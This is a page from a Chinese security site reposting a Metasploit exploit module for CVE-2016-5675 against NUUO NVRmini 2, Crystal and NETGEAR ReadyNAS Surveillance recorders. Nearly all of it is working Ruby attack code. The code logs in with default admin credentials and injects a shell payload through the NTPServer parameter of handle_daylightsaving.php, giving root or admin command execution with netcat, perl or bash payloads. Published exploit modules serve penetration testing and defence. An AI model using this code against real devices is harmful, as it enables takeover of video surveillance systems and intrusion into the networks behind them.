首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Co
来源:metasploit.com 作者:Ribeiro 发布时间:2016-08-12   
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution',
      'Description' => %q{
        The NVRmini 2 Network Video Recorder, Crystal NVR and the ReadyNAS Surveillance application are vulnerable
        to an authenticated remote code execution on the exposed web administration interface. An administrative
        account is needed to exploit this vulnerability.
        This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.
        This exploit has been tested on several versions of the NVRmini 2, Crystal and the ReadyNAS Surveillance.
        It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
        in those devices.
      },
      'Author' =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2016-5675'],
          ['US-CERT-VU', '856152'],
          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt'],
          ['URL', 'http://seclists.org/bugtraq/2016/Aug/45']
        ],
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Privileged' => false,  # Runs as root in NVRmini 2 / Crystal, admin in ReadyNas
      'Targets' =>
        [
          [ 'Automatic', { } ],
          [ 'NUUO NVRmini 2', {
            'Payload' =>
              {
                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
                'DisableNops' => true,
                'Compat'      =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'netcat generic perl'
                  }
              },
          }],
          [ 'ReadyNAS NETGEAR Surveillance', {
            'Payload' =>
              {
                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
                'DisableNops' => true,
                'Compat'      =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'netcat generic perl'
                  }
              },
          }],
          [ 'NUUO Crystal', {
            'Payload' =>
              {
                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
                'DisableNops' => true,
                'Compat'      =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'bash'
                  }
              },
          }],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Aug 4 2016'))

    register_options(
      [
        Opt::RPORT(8081),
        OptString.new('TARGETURI', [true,  "Application path", '/']),
        OptString.new('USERNAME', [true, 'The username to login as', 'admin']),
        OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),
      ], self.class)
  end


  def id_target
    return target if target.name != 'Automatic'
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'])
    })
    if res && res.code == 200
      if res.body.to_s =~ /var VENDOR_NAME = "Netgear";/
        print_status("#{peer} - Identified NETGEAR ReadyNAS Surveillance as the target.")
        return targets[2]
      elsif res.body.to_s =~ /v_web_login_login_type/
        print_status("#{peer} - Identified NUUO Crystal as the target.")
        return targets[3]
      else
        print_status("#{peer} - Identified NUUO NVRMini 2 as the target.")
        return targets[1]
      end
    end
  end


  def exploit
    res = send_request_cgi({
            'method' => 'POST',
            'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
            'vars_post' => {
              'user' => datastore['USERNAME'],
              'pass' => datastore['PASSWORD'],
              'submit' => "Login"
            }
        })

    if res && (res.code == 200 || res.code == 302)
      cookie = res.get_cookies
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.")
    end

    my_target = id_target
    if my_target == targets[1]
      if payload.raw.include?("perl")
        fail_with(Failure::Unknown, "The NVRmini 2 only supports generic or netcat payloads.")
      end
      print_status("#{peer} - Executing payload...")
      send_request_cgi({
          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
          'cookie' => cookie,
          'vars_get' => {
            'act' => "update",
            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.encoded
          }
        }, 1)
    elsif my_target == targets[2]
      if payload.raw.include?("netcat")
        fail_with(Failure::Unknown, "ReadyNAS Surveillance does not support netcat payloads.")
      end
      # We also have to fix the perl payload - there's an IO import error on the ReadyNAS that blows
      # it up.
      print_status("#{peer} - Executing payload...")
      send_request_cgi({
          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
          'cookie' => cookie,
          'vars_get' => {
            'act' => "update",
            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw.gsub("-MIO ", "-MIO::Socket ")
          }
        }, 1)
    else
      if not payload.raw.include?("exec")
        fail_with(Failure::Unknown, "NUUO Crystal only supports bash payloads.")
      end
      print_status("#{peer} - Executing payload...")
      send_request_cgi({
          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
          'cookie' => cookie,
          'vars_get' => {
            'act' => "update",
            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw
          }
        }, 1)
    end
    handler
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Netcore Router Udp 53413 Backd
·NUUO NVRmini 2 / NETGEAR Ready
·EyeLock nano NXT 3.5 - Remote
·DLL Side Loading In VMware Hos
·EyeLock nano NXT 3.5 - Local F
·WebNMS Framework Server 5.2 Ar
·EyeLock Myris 3.3.2 - SDK Serv
·FreePBX 13 / 14 - Remote Comma
·vBulletin 5.2.2 - Preauth Serv
·Samsung Smart Home Camera SNH-
·Nagios Network Analyzer 2.2.1
·Actiontec T2200H Remote Revers
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved